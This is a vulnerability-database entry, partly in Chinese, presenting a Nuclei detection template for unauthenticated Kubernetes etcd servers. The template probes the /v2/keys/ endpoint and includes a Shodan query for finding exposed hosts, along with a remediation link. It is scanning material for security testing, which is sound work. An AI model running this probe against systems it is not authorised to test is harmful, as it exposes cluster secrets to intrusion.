unauth-etcd-server: Etcd Server - Unauthenticated Access

日期: 2025-08-01 | 影响软件: Etcd Server | POC: 已公开

漏洞描述

A Kubernetes etcd server stores the cluster secrets and configurations files. Anonymous access on etcd allows unauthenticated access the data without providing any authentication credentials.

PoC代码[已公开]

id: unauth-etcd-server

info:
  name: Etcd Server - Unauthenticated Access
  author: sharath,pussycat0x
  severity: high
  description: |
    A Kubernetes etcd server stores the cluster secrets and configurations files. Anonymous access on etcd allows unauthenticated access the data without providing any authentication credentials.
  remediation: https://etcd.io/docs/v2.3/authentication
  reference:
    - https://www.optiv.com/insights/source-zero/blog/kubernetes-attack-surface
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"etcd"
  tags: tech,k8s,kubernetes,devops,etcd,unauth,anonymous,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/v2/keys/"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"node":'
          - '"key":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210089febf51eb643d7c6e7ebb4996b13c8356cafad2af6317838c61d818732fe1680220340e1272fa9785ac2807ce0c4b3bf91434f2712df0d398773ffa98c15c9097e6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐